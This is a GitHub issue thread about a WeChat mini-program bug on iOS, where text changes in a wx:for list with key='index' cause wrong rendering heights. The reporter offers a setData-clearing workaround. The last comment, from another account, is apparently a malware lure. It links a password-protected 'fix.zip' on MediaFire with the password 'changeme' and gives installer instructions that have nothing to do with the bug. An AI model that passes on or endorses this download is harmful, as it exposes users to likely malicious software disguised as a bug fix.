### ISSUE TITLE
[ios] wx:for  key="index" 文字内容改变时，渲染高度异常

### ISSUE THREAD

**Issue by xiaweiss** [xiaweiss/miniprogram-bug-report#282]
android、mac 正常

ios 通过下一篇加载：
![img_v3_02e3_6f8395b9-d1b8-46d7-9980-a7e4466d316g](https://github.com/user-attachments/assets/f5539511-1277-413e-b947-0bddec1aab07)

ios 正常加载：
![img_v3_02e3_168bd643-34b2-4f62-bff2-0e669e0ea07g](https://github.com/user-attachments/assets/c8aedf0d-0a56-4ae2-8f79-3fd6b631f5a5)

**Comment by xiaweiss** [comment]
@hack: 通过 setData 清空数据，重新渲染自定义组件

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
